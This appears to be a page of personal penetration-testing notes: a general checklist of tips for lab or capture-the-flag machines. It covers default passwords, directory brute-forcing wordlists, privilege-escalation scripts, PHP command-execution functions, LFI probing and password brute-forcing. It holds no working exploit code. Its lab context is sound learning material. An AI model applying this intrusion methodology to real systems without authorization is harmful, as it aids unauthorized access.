Hack$Notes
Search…
General Check List

General Checklist

  • Check default passwords.
  • Check versions of services.
  • Try more than one file while directory brute-forcing (i.e. /usr/share/wordlists/dirb/big.txt, /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt, /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt)
  • Once inside a CMS or site check every single page.
  • bash vs sh. Try both when doing privesc. One does not mean the other.
  • SEARCH EVERYTHING.....even if it seems silly!!!! (i.e photos) Check even CSS files.
  • Check other exploits too if there are available. Do not stuck on one. It may say version 2.4 and the exploit with version 2.5 will work too.
  • Enumerate subdomains if you are getting nothing.
  • Check the /opt and /var directories.
  • Intercept traffic with BurpSuite if you are stuck.
  • If you believe there is no other way in (i.e. have found one), then just stick with it and search search search for it.
  • Run more than one privesc scripts (LinEnum, lse.sh, peas etc)
  • If you see http://10.10.10.10/index.php/ run gobuster/dirsearch against it. It may reveal a URL as http://10.10.10.10/index.php/admin/
  • Read the code. It is on the details what it needs to be done/change. Just read the code!!!
  • Try all of them shell_exec, system, exec to be sure.
  • If credentials are not working and you are sure it should, then revert the box. Might have crashed the box somehow along the way.
  • If you are 100% sure the exploit is the one you are looking and it is not working, try 64 bit or 32 bit. Depends the architecture of the box.
  • If there is a redirection to the page....after installing NoRedirect plugin on Firefox....add the page to NOT redirect it. Also intercept the traffic with BurpSuite to see where this goes.
  • Execute commands manually. Sometimes you miss it when running automate scripts.
  • Search and spend some time with LFI/URL parameters
  • Running out of ideas? Brute-Force may be the last option. (use different lists and not only rockyou.txt)
As a general rule:
One finding leads to the next. (e.g. found a file? this will lead you to the next step)
Copy link